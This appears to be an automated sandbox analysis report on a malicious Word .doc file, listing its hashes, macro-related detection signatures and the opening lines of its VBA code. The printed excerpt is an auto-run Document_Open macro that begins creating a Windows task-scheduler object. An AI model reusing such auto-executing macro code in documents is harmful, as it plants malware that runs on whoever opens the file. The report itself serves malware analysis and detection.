General

  • Target

    0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae

  • Size

    429KB

  • MD5

    2add40a089dad67f2edb6177cd294b88

  • SHA1

    b4fd0de1f29a8d069eb77ab7941d4de925a4c5b7

  • SHA256

    0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae

  • SHA512

    b7dadc5c45741ef4f6b63eee1ed62c088c3064dd78ea0d5149760e98e17416416d9b3f3b39c8eade34d43e1aecdb76f7d2c84c8d4e43a564e77e53d5ad27ec09

  • SSDEEP

    12288:9tY2RRrgcpOeAvY+cX98Z11oOH0PNiUBpvdh:9tYeg1eJLX7EUBpvT

Malware Config

Signatures

  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • 0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae
    .doc windows office2003

    ThisDocument

    1
    Attribute VB_Name = "ThisDocument"
    2
    Attribute VB_Base = "0{09FD2EFF-5669-11D3-B65F-00C04F8EF32D}"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = False
    8
    Attribute VB_Customizable = True
    9
    Private Sub Document_Open()
    10
    Set objTaskService = CreateObject("Schedule.Service")

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.